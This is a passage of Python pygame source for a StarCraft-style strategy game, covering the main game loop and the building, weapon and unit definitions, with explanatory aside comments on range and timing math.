pygame.sprite.OrderedUpdates()\n BuildingList = pygame.sprite.OrderedUpdates()\n\n for object in buildingTypeList:\n # create the sprite\n BuildingList.add(Sprite(object))\n thisBuilding = getSpriteByPosition(len(BuildingList) - 1, BuildingList)\n thisBuilding.isBuilding = True\n\n selectedObject = None\n\n clock = pygame.time.Clock()\n running = True\n\n while running:\n clock.tick(30)\n \n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n running = False\n if event.type == MOUSEBUTTONDOWN:\n if event.button == 1: #on left click\n changed = False\n for object in UnitList: #for all sprites\n if approxEquals(object, event.pos[0], event.pos[1]):\n selectedObject = object #set new selected sprite\n changed = True\n for object in BuildingList: #for all buildings too\n if approxEquals(object, event.pos[0], event.pos[1]):\n 
selectedObject = object #set new selected sprite\n changed = True\n if changed == False: #checks if the background was selected, and sets no selected object\n selectedObject = None\n if event.button == 3:\n if selectedObject != None:\n if selectedObject.isBuilding != True:\n attacked = False\n for object in UnitList: #for all sprites\n if attacked == False and approxEquals(object, event.pos[0], event.pos[1]) and object != selectedObject and object.Type.Team != selectedObject.Type.Team and (selectedObject.Type.attackType.attackAir == object.Type.unitFlying or selectedObject.Type.attackType.attackGround != object.Type.unitFlying):\n #check distance is less than range\n actualDist = rangeCheck(selectedObject, object)\n if actualDist <= (selectedObject.Type.attackType.attackRange * 50 + (object.Type.size)) and selectedObject.attackCounter >= (selectedObject.Type.attackType.attackCooldown * 30): #range check\n AttackList.add(Sprite(selectedObject.Type.attackType))\n thisAttack = getSpriteByPosition(len(AttackList) - 1, AttackList)\n thisAttack.isAttack = True\n thisAttack.trueX = selectedObject.trueX #sets start pos\n thisAttack.trueY = selectedObject.trueY\n thisAttack.targetSprite = object #saves target sprite for retargetting\n thisAttack.target = object.rect.center #sets target\n if selectedObject.Type.attackType.Name == \"Volatile Burst\":\n selectedObject.kill()\n attacked = True\n selectedObject.attackCounter = 0\n selectedObject.targetSprite = object\n selectedObject.target = None\n elif (actualDist > (selectedObject.Type.attackType.attackRange * 50 + (object.Type.size))) or (actualDist <= (selectedObject.Type.attackType.attackRange * 50 + (object.Type.size)) and selectedObject.attackCounter < (selectedObject.Type.attackType.attackCooldown * 30)):\n selectedObject.targetSprite = object\n attacked = True\n for object in BuildingList: #for all sprites\n if attacked == False and approxEquals(object, event.pos[0], event.pos[1]) and object != selectedObject and object.Type.Team != selectedObject.Type.Team and (selectedObject.Type.attackType.attackAir == object.Type.unitFlying or selectedObject.Type.attackType.attackGround != object.Type.unitFlying):\n #check distance is less than range\n actualDist = rangeCheck(selectedObject, object)\n if actualDist <= (selectedObject.Type.attackType.attackRange * 50 + (object.Type.size)) and selectedObject.attackCounter >= (selectedObject.Type.attackType.attackCooldown * 30): #range check\n AttackList.add(Sprite(selectedObject.Type.attackType))\n thisAttack = getSpriteByPosition(len(AttackList) - 1, AttackList)\n thisAttack.isAttack = True\n thisAttack.trueX = selectedObject.trueX #sets start pos\n thisAttack.trueY = selectedObject.trueY\n thisAttack.targetSprite = object #saves target sprite for retargetting\n thisAttack.target = object.rect.center #sets target\n if selectedObject.Type.attackType.Name == \"Volatile Burst\":\n selectedObject.kill()\n attacked = True\n selectedObject.attackCounter = 0\n selectedObject.targetSprite = object\n selectedObject.target = None\n elif (actualDist > (selectedObject.Type.attackType.attackRange * 50 + (object.Type.size))) or (actualDist <= (selectedObject.Type.attackType.attackRange * 50 + (object.Type.size)) and selectedObject.attackCounter < (selectedObject.Type.attackType.attackCooldown * 30)):\n selectedObject.targetSprite = object\n attacked = True\n if attacked == False: #checks if nothing was attacked\n selectedObject.target = event.pos # set the sprite.target to the mouse click position\n 
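# Aside: the range tests above convert an attack's range from game units
# to pixels as range * 50, then pad by the target's sprite size, so larger
# targets can be hit from slightly farther away. A condensed, illustrative
# sketch of that test:
def in_range(dist_px, attack_range_units, target_size_px, px_per_unit=50):
    return dist_px <= attack_range_units * px_per_unit + target_size_px

# A range-6 attack against a 64 px target reaches up to 6*50 + 64 = 364 px:
assert in_range(364, 6, 64)
assert not in_range(365, 6, 64)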
selectedObject.targetSprite = None #no enemy target\n if event.type == pygame.KEYDOWN:\n if event.key == pygame.K_a: #keydown a\n if selectedObject != None and selectedObject.isBuilding == True and selectedObject.Type.isResearching == False:\n selectedObject.Type.research(selectedObject, \"a\")\n if event.key == pygame.K_c: #keydown c\n if selectedObject != None and selectedObject.isBuilding == True and selectedObject.Type.isResearching == False:\n selectedObject.Type.research(selectedObject, \"c\")\n if event.key == pygame.K_d: #keydown d\n if selectedObject != None and selectedObject.isBuilding == True and selectedObject.Type.isResearching == False:\n selectedObject.Type.research(selectedObject, \"d\")\n if event.key == pygame.K_e: #keydown e\n if selectedObject != None and selectedObject.isBuilding == True and selectedObject.Type.isResearching == False:\n selectedObject.Type.research(selectedObject, \"e\")\n if event.key == pygame.K_h: #keydown h\n if selectedObject != None and selectedObject.isBuilding == True and selectedObject.Type.isResearching == False:\n selectedObject.Type.research(selectedObject, \"h\")\n if event.key == pygame.K_i: #keydown i\n if selectedObject != None and selectedObject.isBuilding == True and selectedObject.Type.isResearching == False:\n selectedObject.Type.research(selectedObject, \"i\")\n if event.key == pygame.K_r: #keydown r\n if selectedObject != None and selectedObject.isBuilding == True and selectedObject.Type.isResearching == False:\n selectedObject.Type.research(selectedObject, \"r\")\n if event.key == pygame.K_s: #keydown s\n if selectedObject != None and selectedObject.isBuilding == True and selectedObject.Type.isResearching == False:\n selectedObject.Type.research(selectedObject, \"s\")\n if event.key == pygame.K_t: #keydown t\n if selectedObject != None and selectedObject.isBuilding == True and selectedObject.Type.isResearching == False:\n selectedObject.Type.research(selectedObject, \"t\")\n if event.key == pygame.K_v: #keydown v\n if selectedObject != None and selectedObject.isBuilding == True and selectedObject.Type.isResearching == False:\n selectedObject.Type.research(selectedObject, \"v\")\n if event.key == pygame.K_x: #keydown x\n if selectedObject != None and selectedObject.isBuilding == True and selectedObject.Type.isResearching == False:\n selectedObject.Type.research(selectedObject, \"x\")\n if event.key == pygame.K_z: #keydown z\n if selectedObject != None and selectedObject.isBuilding == True and selectedObject.Type.isResearching == False: #if a building and not researching\n selectedObject.Type.research(selectedObject, \"z\") #research this building's z, if it has one.\n if event.key == pygame.K_ESCAPE:\n if selectedObject != None and selectedObject.isBuilding == True and selectedObject.Type.isResearching == True:\n selectedObject.Type.isResearching = False\n selectedObject.researchCounter = 0\n selectedObject.Type.researchType = None\n originalImage = pygame.image.load(os.path.join('sprites', selectedObject.Type.Image1))\n selectedObject.image.blit(originalImage, originalImage.get_rect())\n if event.key == pygame.K_RIGHT: #sets bg scrolling on\n horVelocity += 10\n if event.key == pygame.K_LEFT:\n horVelocity -= 10\n if event.key == pygame.K_UP:\n verVelocity -= 10\n if event.key == pygame.K_DOWN:\n verVelocity += 10\n if event.type == pygame.KEYUP: \n if event.key == pygame.K_RIGHT:\n horVelocity -= 10\n if event.key == pygame.K_LEFT: #sets bg scrolling off\n horVelocity += 10\n if event.key == pygame.K_UP:\n verVelocity += 10\n 
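# Aside: the twelve per-letter KEYDOWN branches above differ only in the
# letter they pass to research(). They could be collapsed with a lookup
# table; a sketch that assumes it runs inside the same event loop, with
# the same selectedObject checks:
HOTKEY_LETTERS = {
    pygame.K_a: "a", pygame.K_c: "c", pygame.K_d: "d", pygame.K_e: "e",
    pygame.K_h: "h", pygame.K_i: "i", pygame.K_r: "r", pygame.K_s: "s",
    pygame.K_t: "t", pygame.K_v: "v", pygame.K_x: "x", pygame.K_z: "z",
}

letter = HOTKEY_LETTERS.get(event.key)
if (letter is not None and selectedObject is not None
        and selectedObject.isBuilding
        and not selectedObject.Type.isResearching):
    selectedObject.Type.research(selectedObject, letter)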
if event.key == pygame.K_DOWN:\n verVelocity -= 10\n\n if horVelocity or verVelocity != 0:\n horCoordinate += horVelocity #moves bg when key held\n verCoordinate += verVelocity\n\n AllSprites = [UnitList, AttackList, BuildingList]#define list of all lists\n for object in AllSprites: #move all sprites too\n for object in object:\n if horCoordinate <= maxHor and horCoordinate >= minHor: #adjust x postition unless at edge\n object.trueX -= horVelocity\n if object.isBuilding == False and object.isAttack == False and object.target != None:\n object.target = ((object.target[0] - horVelocity), object.target[1])\n if verCoordinate <= maxVer and verCoordinate >= minVer: #adjust y position\n object.trueY -= verVelocity\n if object.isBuilding == False and object.isAttack == False and object.target != None:\n object.target = ((object.target[0]), (object.target[1] - verVelocity))\n object.rect.center = (round(object.trueX),round(object.trueY))\n \n if horCoordinate > maxHor: #stops at edges of bg\n horCoordinate = maxHor\n if horCoordinate < minHor:\n horCoordinate = minHor\n if verCoordinate > maxVer:\n verCoordinate = maxVer\n if verCoordinate < minVer:\n verCoordinate = minVer\n \n screen.fill((0,0,0))\n viewport = background_image.subsurface((horCoordinate, verCoordinate) + (800, 600))\n screen.blit(viewport, (0,0))\n \n #auto attack\n for a in UnitList:\n for object in UnitList:\n actualDist = rangeCheck(a, object)\n if (a.target == a.rect.center or a.target == None) and actualDist <= (a.Type.attackType.attackRange * 50 + (object.Type.size)) and a.attackCounter >= (a.Type.attackType.attackCooldown * 30) and a != object and a.Type.Team != object.Type.Team and (a.Type.attackType.attackAir == object.Type.unitFlying or a.Type.attackType.attackGround != object.Type.unitFlying):\n AttackList.add(Sprite(a.Type.attackType))\n thisAttack = getSpriteByPosition(len(AttackList) - 1, AttackList)\n thisAttack.isAttack = True\n thisAttack.trueX = a.trueX #sets start pos\n thisAttack.trueY = a.trueY\n thisAttack.targetSprite = object #saves target sprite for retargetting\n thisAttack.target = object.rect.center #sets target\n if a.Type.attackType.Name == \"Volatile Burst\":\n a.kill()\n a.attackCounter = 0\n a.targetSprite = object\n a.target = None\n \n #building collision commented out for now because poorly implemented\n '''\n for object in BuildingList: #building list collisions\n collisionList = pygame.sprite.spritecollide(object, UnitList, False) #obtain list of any hits with units\n Building = object\n for object in collisionList:\n object.target = None #stop moving\n object.rect.center = (object.trueX - 6, object.trueY - 6) #move out of collision range to allow retargeting\n if pygame.sprite.collide_rect(object, Building): #check move worked\n object.rect.center = (object.trueX + 12, object.trueY + 12) #move in other direction to compensate\n ''' \n\n\n \n animInit = 0 #var to skip if for first run\n for counter in range(0,2):\n if counter == 0:\n thisList = UnitList\n else:\n thisList = AttackList\n for object in AttackList:\n if approxEquals(object.targetSprite, object.trueX, object.trueY):\n object.Type.TakeDamage(object.targetSprite) #apply damage to unit\n if object.targetSprite.Health <= 0: #if health is gone, kill sprite\n object.targetSprite.kill()\n object.kill() #stops rendering upon collision \n for object in thisList:\n if animInit == 1:\n animCounter -= 1 #resets animCounter each run, after first, to avoid speeding up\n animCounter = object.updateAnim(animCounter)\n animInit = 1\n if 
object.isAttack == False:\n if object.attackCounter >= (object.Type.attackType.attackCooldown * 30) and object.targetSprite == None: #leaves counter at max\n object.attackCounter = object.attackCounter\n elif object.attackCounter >= (object.Type.attackType.attackCooldown * 30): #resets if attacking\n object.attackCounter = 0\n else:\n object.attackCounter += 1 \n AttackList = object.updatePosition(AttackList) #updates position of all sprites\n\n \n\n font = pygame.font.Font(None, 36) #completion percentages\n for object in BuildingList:\n if object.Type.isResearching == True:\n originalImage = pygame.image.load(os.path.join('sprites', object.Type.Image1))\n if object.researchCounter >= (object.Type.researchType.buildTime):\n object.Type.researchType.x = object.trueX + 96\n object.Type.researchType.y = object.trueY + 96 #sets spawn point\n UnitList.add(Sprite(object.Type.researchType))\n object.researchCounter = 0\n object.Type.researchType = None\n object.Type.isResearching = False\n object.image.blit(originalImage, originalImage.get_rect())\n else:\n object.researchCounter += 1\n object.image.blit(originalImage, originalImage.get_rect())\n percentage = (round(((object.researchCounter / (object.Type.researchType.buildTime)) * 100)))\n text = font.render(str(percentage) + \"%\", 1, (0,0,255))\n textPos = text.get_rect(center=(100, 100))\n object.image.blit(text, textPos)\n \n UnitList.draw(screen) #draws sprites\n AttackList.draw(screen)\n BuildingList.draw(screen)\n \n pygame.display.flip() #draw frame\n \n pygame.quit() # for a smooth quit\n\nif __name__ == \"__main__\":\n animCounter = 0\n unitTypeList = []\n attackTypeList = []\n buildingTypeList = []\n \n\n #building definitions\n \n gateway = buildingType()\n gateway.Name = \"Gateway\"\n gateway.Image1 = \"Gateway 128x128.bmp\"\n gateway.Team = \"Protoss\"\n gateway.hotKey = [\"s\", \"z\"]\n gateway.unitOrder = [\"Stalker\", \"Zealot\"]\n buildingTypeList.append(gateway)\n\n barracks = buildingType()\n barracks.Name = \"Barracks\"\n barracks.Image1 = \"Barracks 128x128.bmp\"\n barracks.Team = \"Terran\"\n barracks.hotKey = [\"a\", \"d\"]\n barracks.unitOrder = [\"Marine\", \"Marauder\"]\n barracks.x = 300\n buildingTypeList.append(barracks)\n\n factory = buildingType()\n factory.Name = \"Factory\"\n factory.Image1 = \"Factory 128x128.bmp\"\n factory.Team = \"Terran\"\n factory.hotKey = [\"s\",\"e\"]\n factory.unitOrder = [\"Siege Tank\", \"Hellion\"]\n factory.x = 500\n buildingTypeList.append(factory)\n\n starport = buildingType()\n starport.Name = \"Starport\"\n starport.Image1 = \"Starport 128x128.bmp\"\n starport.Team = \"Terran\"\n starport.hotKey = [\"e\",\"v\"]\n starport.unitOrder = [\"Banshee\", \"Viking\"]\n starport.x = 700\n buildingTypeList.append(starport)\n\n roboticsFacility = buildingType()\n roboticsFacility.Name = \"Robotics Facility\"\n roboticsFacility.Image1 = \"Robotics 128x128.bmp\"\n roboticsFacility.Team = \"Protoss\"\n roboticsFacility.hotKey = [\"c\", \"i\"]\n roboticsFacility.unitOrder = [\"Colossus\", \"Immortal\"]\n roboticsFacility.y = 300\n buildingTypeList.append(roboticsFacility)\n\n stargate = buildingType()\n stargate.Name = \"Stargate\"\n stargate.Image1 = \"Stargate 128x128.bmp\"\n stargate.Team = \"Protoss\"\n stargate.hotKey = [\"v\", \"x\"]\n stargate.unitOrder = [\"Void Ray\", \"Phoenix\"]\n stargate.y = 500\n buildingTypeList.append(stargate)\n\n spawningPool = buildingType()\n spawningPool.Name = \"Spawning Pool\"\n spawningPool.Image1 = \"Pool 128x128.bmp\"\n spawningPool.Team = \"Zerg\"\n 
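# Aside: all timers in this file count frames at clock.tick(30), so a
# duration in seconds becomes frames as seconds * 30 -- this is why the
# attack test above uses attackCounter >= attackCooldown * 30. A condensed
# sketch with illustrative names:
FPS = 30

def cooldown_ready(frames_elapsed, cooldown_seconds, fps=FPS):
    return frames_elapsed >= cooldown_seconds * fps

# A 1.5 s cooldown becomes ready on frame 45:
assert cooldown_ready(45, 1.5)
assert not cooldown_ready(44, 1.5)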
spawningPool.hotKey = [\"e\",\"z\"]\n spawningPool.unitOrder = [\"Baneling\", \"Zergling\"]\n spawningPool.y = 500\n spawningPool.x = 300\n buildingTypeList.append(spawningPool)\n\n roachWarren = buildingType()\n roachWarren.Name = \"Roach Warren\"\n roachWarren.Image1 = \"RoachWarren 128x128.bmp\"\n roachWarren.Team = \"Zerg\"\n roachWarren.hotKey = [\"h\",\"r\"]\n roachWarren.unitOrder = [\"Hydralisk\", \"Roach\"]\n roachWarren.y = 500\n roachWarren.x = 500\n buildingTypeList.append(roachWarren)\n\n spire = buildingType()\n spire.Name = \"Spire\"\n spire.Image1 = \"Spire 128x128.bmp\"\n spire.Team = \"Zerg\"\n spire.hotKey = [\"c\",\"t\"]\n spire.unitOrder = [\"Corruptor\", \"Mutalisk\"]\n spire.y = 500\n spire.x = 700\n buildingTypeList.append(spire)\n\n #attack definitions\n \n particleDisruptors = attackType()\n particleDisruptors.Name = \"Particle Disruptors\"\n particleDisruptors.Image1 = 'StalkerAttack 32x32.bmp'\n particleDisruptors.Image2 = 'StalkerAttack 32x32.bmp'\n particleDisruptors.attackDamage = 10\n particleDisruptors.attackAir = True\n particleDisruptors.attackGround = True\n particleDisruptors.attackRange = 6\n particleDisruptors.attackCooldown = 1.44\n attackTypeList.append(particleDisruptors)\n\n psiBlades = attackType()\n psiBlades.Name = \"Psi Blades\"\n psiBlades.Image1 = 'ZealotAttack 32x32.bmp'\n psiBlades.Image2 = 'ZealotAttack 32x32.bmp'\n psiBlades.attackDamage = 16\n psiBlades.attackAir = False\n psiBlades.attackGround = True\n psiBlades.attackRange = 0.1\n psiBlades.attackCooldown = 1.2\n attackTypeList.append(psiBlades)\n\n c14Rifle = attackType()\n c14Rifle.Size = 16\n c14Rifle.Name = \"C-14 Gauss Rifle\"\n c14Rifle.Image1 = 'MarineAttack1 16x16.bmp'\n c14Rifle.Image2 = 'MarineAttack2 16x16.bmp'\n c14Rifle.attackDamage = 6\n c14Rifle.attackGround = True\n c14Rifle.attackAir = True\n c14Rifle.attackRange = 5\n c14Rifle.attackCooldown = 0.8608\n attackTypeList.append(c14Rifle)\n\n punisherGrenades = attackType()\n punisherGrenades.Name = \"Punisher Grenades\"\n punisherGrenades.Image1 = 'MarauderAttack1 32x32.bmp'\n punisherGrenades.Image2 = 'MarauderAttack2 32x32.bmp'\n punisherGrenades.attackDamage = 10\n punisherGrenades.attackGround = True\n punisherGrenades.attackAir = False\n punisherGrenades.attackRange = 6\n punisherGrenades.attackCooldown = 1.5\n attackTypeList.append(punisherGrenades)\n\n internalFlamethrower = attackType()\n internalFlamethrower.Name = \"Internal Flamethrower\"\n internalFlamethrower.Image1 = 'HellionAttack1 32x64.bmp'\n internalFlamethrower.Image2 = 'HellionAttack2 32x64.bmp'\n internalFlamethrower.attackDamage = 8\n internalFlamethrower.attackGround = True\n internalFlamethrower.attackAir = False\n internalFlamethrower.attackRange = 5\n internalFlamethrower.attackCooldown = 2.5\n attackTypeList.append(internalFlamethrower)\n\n Cannon = attackType()\n Cannon.Name = \"90mm Twin Cannon\"\n Cannon.Image1 = 'SiegeTankAttack 32x32.bmp'\n Cannon.Image2 = 'SiegeTankAttack 32x32.bmp'\n Cannon.attackDamage = 10\n Cannon.attackGround = True\n Cannon.attackAir = False\n Cannon.attackRange = 7\n Cannon.attackCooldown = 1.04\n attackTypeList.append(Cannon)\n\n backlashRockets = attackType()\n backlashRockets.Name = \"Backlash Rockets\"\n backlashRockets.Image1 = 'BansheeAttack 32x32.bmp'\n backlashRockets.Image2 = 'BansheeAttack 32x32.bmp'\n backlashRockets.attackDamage = 24\n backlashRockets.attackGround = True\n backlashRockets.attackAir = False\n backlashRockets.attackRange = 6\n backlashRockets.attackCooldown = 1.25\n 
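# Aside: the long attribute blocks in this section could be generated from
# a table instead of repeated per-field assignments. A minimal sketch of
# that pattern (field order: damage, hits ground, hits air, range,
# cooldown; the two rows reuse values from psiBlades and c14Rifle above,
# and the Image1/Image2 fields are omitted for brevity):
DEMO_ATTACK_TABLE = {
    "Psi Blades": (16, True, False, 0.1, 1.2),
    "C-14 Gauss Rifle": (6, True, True, 5, 0.8608),
}
demo_attacks = []
for name, (dmg, ground, air, rng, cd) in DEMO_ATTACK_TABLE.items():
    atk = attackType()
    atk.Name = name
    atk.attackDamage, atk.attackGround, atk.attackAir = dmg, ground, air
    atk.attackRange, atk.attackCooldown = rng, cd
    demo_attacks.append(atk)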
attackTypeList.append(backlashRockets)\n\n lanzerTorpedoes = attackType()\n lanzerTorpedoes.Name = \"Lanzer Torpedoes\"\n lanzerTorpedoes.Image1 = 'VikingAttack1 32x32.bmp'\n lanzerTorpedoes.Image2 = 'VikingAttack2 32x32.bmp'\n lanzerTorpedoes.attackDamage = 20\n lanzerTorpedoes.attackGround = False\n lanzerTorpedoes.attackAir = True\n lanzerTorpedoes.attackRange = 9\n lanzerTorpedoes.attackCooldown = 2\n attackTypeList.append(lanzerTorpedoes)\n\n thermalLances = attackType()\n thermalLances.Name = \"Thermal Lances\"\n thermalLances.Image1 = 'ColossusAttack1 32x64.bmp'\n thermalLances.Image2 = 'ColossusAttack2 32x64.bmp'\n thermalLances.attackDamage = 30\n thermalLances.attackGround = True\n thermalLances.attackAir = False\n thermalLances.attackRange = 9\n thermalLances.attackCooldown = 1.65\n attackTypeList.append(thermalLances)\n\n phaseDisruptors = attackType()\n phaseDisruptors.Name = \"Phase Disruptors\"\n phaseDisruptors.Image1 = 'ImmortalAttack 32x32.bmp'\n phaseDisruptors.Image2 = 'ImmortalAttack 32x32.bmp'\n phaseDisruptors.attackDamage = 20\n phaseDisruptors.attackGround = True\n phaseDisruptors.attackAir = False\n phaseDisruptors.attackRange = 6\n phaseDisruptors.attackCooldown = 1.45\n attackTypeList.append(phaseDisruptors)\n\n prismaticBeam = attackType()\n prismaticBeam.Name = \"Prismatic Beam\"\n prismaticBeam.Image1 = 'VoidRayAttack1 32x64.bmp'\n prismaticBeam.Image2 = 'VoidRayAttack2 32x64.bmp'\n prismaticBeam.attackDamage = 8\n prismaticBeam.attackGround = True\n prismaticBeam.attackAir = True\n prismaticBeam.attackRange = 6\n prismaticBeam.attackCooldown = 0.6\n attackTypeList.append(prismaticBeam)\n\n ionCannons = attackType()\n ionCannons.Name = \"Ion Cannons\"\n ionCannons.Image1 = 'PhoenixAttack1 32x32.bmp'\n ionCannons.Image2 = 'PhoenixAttack2 32x32.bmp'\n ionCannons.attackDamage = 10\n ionCannons.attackGround = False\n ionCannons.attackAir = True\n ionCannons.attackRange = 4\n ionCannons.attackCooldown = 1.11\n attackTypeList.append(ionCannons)\n\n claws = attackType()\n claws.size = 16\n claws.Name = \"Claws\"\n claws.Image1 = 'ZerglingAttack 16x16.bmp'\n claws.Image2 = 'ZerglingAttack 16x16.bmp'\n claws.attackDamage = 5\n claws.attackGround = True\n claws.attackAir = False\n claws.attackRange = 0.1\n claws.attackCooldown = 0.587\n attackTypeList.append(claws)\n\n volatileBurst = attackType()\n volatileBurst.Name = \"Volatile Burst\"\n volatileBurst.Image1 = 'BanelingAttack 32x32.bmp'\n volatileBurst.Image2 = 'BanelingAttack 32x32.bmp'\n volatileBurst.attackDamage = 35\n volatileBurst.attackGround = True\n volatileBurst.attackAir = False\n volatileBurst.attackRange = 0.1\n volatileBurst.attackCooldown = 0.833\n attackTypeList.append(volatileBurst)\n\n acidSaliva = attackType()\n acidSaliva.Name = \"Acid Saliva\"\n acidSaliva.Image1 = 'RoachAttack1 32x32.bmp'\n acidSaliva.Image2 = 'RoachAttack2 32x32.bmp'\n acidSaliva.attackDamage = 16\n acidSaliva.attackGround = True\n acidSaliva.attackAir = False\n acidSaliva.attackRange = 4\n acidSaliva.attackCooldown = 2\n attackTypeList.append(acidSaliva)\n\n needleSpines = attackType()\n needleSpines.size = 16\n needleSpines.Name = \"Needle Spines\"\n needleSpines.Image1 = 'HydraAttack 16x16.bmp'\n needleSpines.Image2 = 'HydraAttack 16x16.bmp'\n needleSpines.attackDamage = 12\n needleSpines.attackGround = True\n needleSpines.attackAir = True\n needleSpines.attackRange = 5\n needleSpines.attackCooldown = 0.83\n attackTypeList.append(needleSpines)\n\n glaiveWurm = attackType()\n glaiveWurm.Name = \"Glaive Wurm\"\n 
glaiveWurm.Image1 = 'MutaliskAttack 16x16.bmp'\n glaiveWurm.Image2 = 'MutaliskAttack 16x16.bmp'\n glaiveWurm.attackDamage = 9\n glaiveWurm.attackGround = True\n glaiveWurm.attackAir = True\n glaiveWurm.attackRange = 3\n glaiveWurm.attackCooldown = 1.5246\n attackTypeList.append(glaiveWurm)\n\n parasiteSpores = attackType()\n parasiteSpores.Name = \"Parasite Spores\"\n parasiteSpores.Image1 = 'CorruptorAttack1 32x32.bmp'\n parasiteSpores.Image2 = 'CorruptorAttack2 32x32.bmp'\n parasiteSpores.attackDamage = 14\n parasiteSpores.attackGround = False\n parasiteSpores.attackAir = True\n parasiteSpores.attackRange = 6\n parasiteSpores.attackCooldown = 1.9\n attackTypeList.append(parasiteSpores)\n \n #unit definitions\n \n stalker = unitType()\n stalker.attackType = particleDisruptors\n stalker.Name = \"Stalker\"\n stalker.Team = \"Protoss\"\n stalker.Image1 = 'Stalker1 64x64.bmp'\n stalker.Image2 = 'Stalker2 64x64.bmp'\n stalker.Speed = 2.953\n stalker.buildTime = 42\n stalker.unitHealth = 160\n unitFlying = False\n unitTypeList.append(stalker)\n\n zealot = unitType()\n zealot.size = 48\n zealot.attackType = psiBlades\n zealot.Name = \"Zealot\"\n zealot.Team = \"Protoss\"\n zealot.Image1 = 'Zealot1 48x48.bmp'\n zealot.Image2 = 'Zealot2 48x48.bmp'\n zealot.Speed = 2.25\n zealot.buildTime = 38\n zealot.unitHealth = 150\n zealot.unitFlying = False\n unitTypeList.append(zealot)\n\n marine = unitType()\n marine.size = 48\n marine.attackType = c14Rifle\n marine.Name = \"Marine\"\n marine.Team = \"Terran\"\n marine.Image1 = 'Marine1 48x48.bmp'\n marine.Image2 = 'Marine2 48x48.bmp'\n marine.Speed = 2.25\n marine.buildTime = 25\n marine.unitHealth = 45\n marine.unitFlying = False\n unitTypeList.append(marine)\n\n marauder = unitType()\n marauder.attackType = punisherGrenades\n marauder.Name = \"Marauder\"\n marauder.Team = \"Terran\"\n marauder.Image1 = 'Marauder1 64x64.bmp'\n marauder.Image2 = 'Marauder2 64x64.bmp'\n marauder.Speed = 2.25\n marauder.buildTime = 30\n marauder.unitHealth = 125\n marauder.unitFlying = False\n unitTypeList.append(marauder)\n\n hellion = unitType()\n hellion.attackType = internalFlamethrower\n hellion.Name = \"Hellion\"\n hellion.Team = \"Terran\"\n hellion.Image1 = 'Hellion1 64x64.bmp'\n hellion.Image2 = 'Hellion2 64x64.bmp'\n hellion.Speed = 4.25\n hellion.buildTime = 30\n hellion.unitHealth = 90\n hellion.unitFlying = False\n unitTypeList.append(hellion)\n\n tank = unitType()\n tank.attackType = Cannon\n tank.Name = \"Siege Tank\"\n tank.Team = \"Terran\"\n tank.Image1 = 'SiegeTank1 64x64.bmp'\n tank.Image2 = 'SiegeTank2 64x64.bmp'\n tank.Speed = 2.25\n tank. buildTime = 45\n tank.unitHealth = 160\n tank.unitFlying = False\n unitTypeList.append(tank)\n\n banshee = unitType()\n banshee.attackType = backlashRockets\n banshee.Name = \"Banshee\"\n banshee.Team = \"Terran\"\n banshee.Image1 = 'Banshee1 64x64.bmp'\n banshee.Image2 = 'Banshee2 64x64.bmp'\n banshee.Speed = 2.75\n banshee. 
buildTime = 60\n banshee.unitHealth = 140\n banshee.unitFlying = True\n unitTypeList.append(banshee)\n\n viking = unitType()\n viking.attackType = lanzerTorpedoes\n viking.Name = \"Viking\"\n viking.Team = \"Terran\"\n viking.Image1 = 'Viking1 64x64.bmp'\n viking.Image2 = 'Viking2 64x64.bmp'\n viking.Speed = 2.75\n viking.buildTime = 42\n viking.unitHealth = 125\n viking.unitFlying = True\n unitTypeList.append(viking)\n\n colossus = unitType()\n colossus.size = 128\n colossus.attackType = thermalLances\n colossus.Name = \"Colossus\"\n colossus.Team = \"Protoss\"\n colossus.Image1 = 'Colossus1 128x128.bmp'\n colossus.Image2 = 'Colossus2 128x128.bmp'\n colossus.Speed = 2.25\n colossus.buildTime = 75\n colossus.unitHealth = 350\n colossus.unitFlying = False\n unitTypeList.append(colossus)\n\n immortal = unitType()\n immortal.attackType = phaseDisruptors\n immortal.Name = \"Immortal\"\n immortal.Team = \"Protoss\"\n immortal.Image1 = 'Immortal1 64x64.bmp'\n immortal.Image2 = 'Immortal2 64x64.bmp'\n immortal.Speed = 2.25\n immortal.buildTime = 55\n immortal.unitHealth = 300\n immortal.unitFlying = False\n unitTypeList.append(immortal)\n\n voidRay = unitType()\n voidRay.attackType = prismaticBeam\n voidRay.Name = \"Void Ray\"\n voidRay.Team = \"Protoss\"\n voidRay.Image1 = 'VoidRay1 64x64.bmp'\n voidRay.Image2 = 'VoidRay2 64x64.bmp'\n voidRay.Speed = 2.25\n voidRay.buildTime = 60\n voidRay.unitHealth = 250\n voidRay.unitFlying = True\n unitTypeList.append(voidRay)\n\n phoenix = unitType()\n phoenix.attackType = ionCannons\n phoenix.Name = \"Phoenix\"\n phoenix.Team = \"Protoss\"\n phoenix.Image1 = 'Phoenix1 64x64.bmp'\n phoenix.Image2 = 'Phoenix2 64x64.bmp'\n phoenix.Speed = 4.25\n phoenix.buildTime = 35\n phoenix.unitHealth = 180\n phoenix.unitFlying = True\n unitTypeList.append(phoenix)\n\n zergling = unitType()\n zergling.size = 32\n zergling.attackType = claws\n zergling.Name = \"Zergling\"\n zergling.Team = \"Zerg\"\n zergling.Image1 = 'Zergling1 32x32.bmp'\n zergling.Image2 = 'Zergling2 32x32.bmp'\n zergling.Speed = 4.6991\n zergling.buildTime = 24\n zergling.unitHealth = 35\n zergling.unitFlying = False\n unitTypeList.append(zergling)\n\n baneling = unitType()\n baneling.size = 32\n baneling.attackType = volatileBurst\n baneling.Name = \"Baneling\"\n baneling.Team = \"Zerg\"\n baneling.Image1 = 'Baneling1 32x32.bmp'\n baneling.Image2 = 'Baneling2 32x32.bmp'\n baneling.Speed = 2.9531\n baneling.buildTime = 44\n baneling.unitHealth = 30\n baneling.unitFlying = False\n unitTypeList.append(baneling)\n\n roach = unitType()\n roach.attackType = acidSaliva\n roach.Name = \"Roach\"\n roach.Team = \"Zerg\"\n roach.Image1 = 'Roach1 64x64.bmp'\n roach.Image2 = 'Roach2 64x64.bmp'\n roach.Speed = 2.25\n roach.buildTime = 27\n roach.unitHealth = 145\n roach.unitFlying = False\n unitTypeList.append(roach)\n\n hydralisk = unitType()\n hydralisk.attackType = needleSpines\n hydralisk.Name = \"Hydralisk\"\n hydralisk.Team = \"Zerg\"\n hydralisk.Image1 = 'Hydra1 64x64.bmp'\n hydralisk.Image2 = 'Hydra2 64x64.bmp'\n hydralisk.Speed = 2.25\n hydralisk.buildTime = 33\n hydralisk.unitHealth = 80\n hydralisk.unitFlying = False\n unitTypeList.append(hydralisk)\n\n mutalisk = unitType()\n mutalisk.attackType = glaiveWurm\n mutalisk.Name = \"Mutalisk\"\n mutalisk.Team = \"Zerg\"\n mutalisk.Image1 = 'Mutalisk1 